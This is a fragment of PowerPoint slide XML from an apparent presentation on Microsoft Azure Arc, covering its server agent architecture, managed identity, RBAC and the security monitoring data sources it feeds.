                    <a:pt x="350" y="33"/>
                    <a:pt x="357" y="20"/>
                    <a:pt x="368" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="2"/>
                    <a:pt x="394" y="0"/>
                    <a:pt x="408" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="431" y="10"/>
                    <a:pt x="454" y="20"/>
                    <a:pt x="475" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="38"/>
                    <a:pt x="496" y="51"/>
                    <a:pt x="498" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="500" y="79"/>
                    <a:pt x="495" y="93"/>
                    <a:pt x="485" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="149"/>
                    <a:pt x="531" y="149"/>
                    <a:pt x="531" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="541" y="139"/>
                    <a:pt x="555" y="134"/>
                    <a:pt x="569" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="584" y="138"/>
                    <a:pt x="596" y="147"/>
                    <a:pt x="603" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="615" y="180"/>
                    <a:pt x="624" y="203"/>
                    <a:pt x="631" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="635" y="240"/>
                    <a:pt x="632" y="254"/>
                    <a:pt x="624" y="266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="615" y="278"/>
                    <a:pt x="601" y="284"/>
                    <a:pt x="587" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="587" y="284"/>
                    <a:pt x="587" y="284"/>
                    <a:pt x="587" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="587" y="349"/>
                    <a:pt x="587" y="349"/>
                    <a:pt x="587" y="349"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="602" y="349"/>
                    <a:pt x="615" y="356"/>
                    <a:pt x="624" y="367"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="632" y="379"/>
                    <a:pt x="635" y="394"/>
                    <a:pt x="631" y="407"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="624" y="431"/>
                    <a:pt x="615" y="453"/>
                    <a:pt x="603" y="474"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="596" y="487"/>
                    <a:pt x="584" y="495"/>
                    <a:pt x="570" y="497"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="556" y="499"/>
                    <a:pt x="541" y="494"/>
                    <a:pt x="531" y="484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="485" y="530"/>
                    <a:pt x="485" y="530"/>
                    <a:pt x="485" y="530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="486" y="530"/>
                    <a:pt x="486" y="530"/>
                    <a:pt x="486" y="530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="496" y="540"/>
                    <a:pt x="501" y="554"/>
                    <a:pt x="499" y="569"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="497" y="583"/>
                    <a:pt x="488" y="595"/>
                    <a:pt x="476" y="602"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="454" y="614"/>
                    <a:pt x="432" y="624"/>
                    <a:pt x="408" y="631"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="404" y="632"/>
                    <a:pt x="400" y="632"/>
                    <a:pt x="395" y="632"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="107" y="481"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="481"/>
                    <a:pt x="107" y="481"/>
                    <a:pt x="107" y="481"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="69" y="449"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="449"/>
                    <a:pt x="69" y="449"/>
                    <a:pt x="69" y="449"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="52" y="240"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="240"/>
                    <a:pt x="52" y="240"/>
                    <a:pt x="52" y="240"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="69" y="185"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="185"/>
                    <a:pt x="69" y="185"/>
                    <a:pt x="69" y="185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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="444" name="Freeform 363">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{544C0EE2-F191-400F-ACFD-D125FBD2E5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57876" y="4451148"/>
              <a:ext cx="190821" cy="185125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 123 w 256"/>
                <a:gd name="T1" fmla="*/ 250 h 250"/>
                <a:gd name="T2" fmla="*/ 48 w 256"/>
                <a:gd name="T3" fmla="*/ 222 h 250"/>
                <a:gd name="T4" fmla="*/ 8 w 256"/>
                <a:gd name="T5" fmla="*/ 110 h 250"/>
                <a:gd name="T6" fmla="*/ 34 w 256"/>
                <a:gd name="T7" fmla="*/ 90 h 250"/>
                <a:gd name="T8" fmla="*/ 33 w 256"/>
                <a:gd name="T9" fmla="*/ 56 h 250"/>
                <a:gd name="T10" fmla="*/ 199 w 256"/>
                <a:gd name="T11" fmla="*/ 42 h 250"/>
                <a:gd name="T12" fmla="*/ 214 w 256"/>
                <a:gd name="T13" fmla="*/ 208 h 250"/>
                <a:gd name="T14" fmla="*/ 123 w 256"/>
                <a:gd name="T15" fmla="*/ 250 h 250"/>
                <a:gd name="T16" fmla="*/ 50 w 256"/>
                <a:gd name="T17" fmla="*/ 97 h 250"/>
                <a:gd name="T18" fmla="*/ 57 w 256"/>
                <a:gd name="T19" fmla="*/ 119 h 250"/>
                <a:gd name="T20" fmla="*/ 80 w 256"/>
                <a:gd name="T21" fmla="*/ 184 h 250"/>
                <a:gd name="T22" fmla="*/ 175 w 256"/>
                <a:gd name="T23" fmla="*/ 176 h 250"/>
                <a:gd name="T24" fmla="*/ 167 w 256"/>
                <a:gd name="T25" fmla="*/ 80 h 250"/>
                <a:gd name="T26" fmla="*/ 118 w 256"/>
                <a:gd name="T27" fmla="*/ 65 h 250"/>
                <a:gd name="T28" fmla="*/ 72 w 256"/>
                <a:gd name="T29" fmla="*/ 88 h 250"/>
                <a:gd name="T30" fmla="*/ 50 w 256"/>
                <a:gd name="T31" fmla="*/ 97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56" h="250">
                  <a:moveTo>
                    <a:pt x="123" y="250"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="250"/>
                    <a:pt x="70" y="241"/>
                    <a:pt x="48" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="195"/>
                    <a:pt x="0" y="152"/>
                    <a:pt x="8" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="97"/>
                    <a:pt x="21" y="88"/>
                    <a:pt x="34" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="81"/>
                    <a:pt x="25" y="66"/>
                    <a:pt x="33" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="6"/>
                    <a:pt x="150" y="0"/>
                    <a:pt x="199" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="84"/>
                    <a:pt x="256" y="158"/>
                    <a:pt x="214" y="208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="236"/>
                    <a:pt x="157" y="250"/>
                    <a:pt x="123" y="250"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="50" y="97"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="103"/>
                    <a:pt x="59" y="111"/>
                    <a:pt x="57" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="143"/>
                    <a:pt x="61" y="168"/>
                    <a:pt x="80" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="208"/>
                    <a:pt x="151" y="204"/>
                    <a:pt x="175" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="147"/>
                    <a:pt x="196" y="104"/>
                    <a:pt x="167" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="69"/>
                    <a:pt x="136" y="63"/>
                    <a:pt x="118" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="66"/>
                    <a:pt x="83" y="75"/>
                    <a:pt x="72" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="95"/>
                    <a:pt x="58" y="98"/>
                    <a:pt x="50" y="97"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CC0C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8709" tIns="19354" rIns="38709" bIns="19354" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="nb-NO" sz="762"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rektangel: avrundede hjørner 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E60B3CD6-B468-4035-A645-1001A04BCBC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5356044" y="1663045"/>
            <a:ext cx="2810056" cy="947074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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Extend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> management </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>capabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anywhere</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Rektangel: avrundede hjørner 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF1119A2-CA3B-4AE1-B686-41462C64DB23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5379655" y="2850437"/>
            <a:ext cx="2786445" cy="800724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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Provide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Cloud based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>premises</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Rektangel: avrundede hjørner 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51BCD542-F789-48A5-8B57-BCB20A3983F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5360017" y="4982896"/>
            <a:ext cx="2773387" cy="800724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Managed trough Azure Resource Manager</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Rektangel: avrundede hjørner 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A828150-E479-4904-B3AE-6D36B354D189}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5383811" y="3890064"/>
            <a:ext cx="2775534" cy="800724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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Centralized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Security Services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633474-4650-4B5C-B1CC-35703F049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82" y="2628718"/>
            <a:ext cx="1179776" cy="91487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52DE8A-7FC4-4870-BE49-3F5ABFA48578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8468697" y="1643589"/>
            <a:ext cx="3042367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b="1" dirty="0"/>
              <a:t>#1 Infrastructure:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Azure Arc - Azure Stack HCI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Azure Arc - VMware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Azure Arc - Kubernetes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Azure Arc - Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Azure Arc - SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>#2 PaaS Services:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Azure Arc Data Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Azure Arc App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600" dirty="0" err="1"/>
              <a:t>Functions</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO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600" dirty="0"/>
              <a:t>Logic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sz="1600" dirty="0"/>
              <a:t>App Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Azure Arc Edge Kubernetes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47036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50" y="364725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Azure Arc for Servers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02C409-5A0E-ED7F-3A5C-0B4A74386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498" y="1001706"/>
            <a:ext cx="6407285" cy="4914882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rektangel: avrundede hjørner 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89BECBEE-974F-2257-5719-81BCFD355E92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8222461" y="1173804"/>
            <a:ext cx="2810056" cy="1102467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Azure Arc Agent – Integration with Azure Resource Manager</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rektangel: avrundede hjørner 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33937634-A62E-90B5-91AC-DADE8E6E5237}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8219218" y="2515836"/>
            <a:ext cx="2810056" cy="927756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Provides extension and Azure Policy Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rektangel: avrundede hjørner 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{843962C8-239E-2822-6FEB-C73A13863740}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8222460" y="3712338"/>
            <a:ext cx="2810056" cy="927756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Provides the server with its own Azure AD identity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rektangel: avrundede hjørner 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEA9623B-699F-ED63-0561-112CB7D676CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8232187" y="4850859"/>
            <a:ext cx="2810056" cy="1031133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Can be use all the different Azure management capabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rektangel: avrundede hjørner 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D93A24CA-6EE9-4173-B876-A8F8AFA0C75A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1007781" y="6115455"/>
            <a:ext cx="7046723" cy="330742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nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOTE: Since it gets its own Azure AD Managed Identity be careful!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4246560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50" y="364725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Azure Arc for Servers – Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rektangel: avrundede hjørner 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89BECBEE-974F-2257-5719-81BCFD355E92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485729" y="5538280"/>
            <a:ext cx="2416356" cy="1050585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Agent can use public internet or private link (VPN)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rektangel: avrundede hjørner 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33937634-A62E-90B5-91AC-DADE8E6E5237}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3238658" y="5544765"/>
            <a:ext cx="2416356" cy="1024647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Machine is associated with a resource group</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rektangel: avrundede hjørner 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{843962C8-239E-2822-6FEB-C73A13863740}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5913762" y="5531796"/>
            <a:ext cx="2802221" cy="1011675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Typically use policies and DCR’s with subscription or Resource Group scope</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rektangel: avrundede hjørner 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEA9623B-699F-ED63-0561-112CB7D676CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8997430" y="5518825"/>
            <a:ext cx="2810056" cy="1031133"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4668"/>
            </a:avLst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Can then define RBAC using Azure IAM such as access groups for external consultants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CD892C-6C2D-B360-3A08-B3A7BC020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35" y="843994"/>
            <a:ext cx="10103999" cy="4518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70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295" y="539823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Security Monitoring – Seeing the whole picture!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B32D8B-C9FF-4CD1-BE20-C143D2218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1694" y="1367091"/>
            <a:ext cx="1000125" cy="923925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7AD81E5-C07F-4887-B35A-9FF2FB3697A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465787" y="2757153"/>
            <a:ext cx="1953158" cy="2115353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VM Connection (Azure Monitor + Dependency Agent)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91822D0-7E98-4CC5-8A3F-2012CFC94157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5183755" y="2761447"/>
            <a:ext cx="1794219" cy="2115353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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DeviceFileEvents</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Defender for Cloud)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6EB63F4-8557-4DE9-A5A6-508165733650}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7381974" y="2772133"/>
            <a:ext cx="2092767" cy="2115353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Configuration Change </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Azure Automation)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9C0BA8C-E113-4BF3-A525-460C7FC64471}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2790426" y="2770032"/>
            <a:ext cx="1856703" cy="2115353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 dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Events (Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Agent + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sentinel)</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="16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6B72A64-A62E-4287-9DF0-2497EF5DBD8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4323317" y="2244399"/>
            <a:ext cx="48141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b="1" dirty="0"/>
              <a:t>Azure Arc Managed Machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1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1FA410-64D2-43D1-833E-F5FF2D55B8A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9695234" y="2776472"/>
            <a:ext cx="2185481" cy="2115353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b-NO" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DeviceProcess</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Events (Defender for Cloud)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3EBB65-08FC-4C90-A2D8-963DFE093710}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
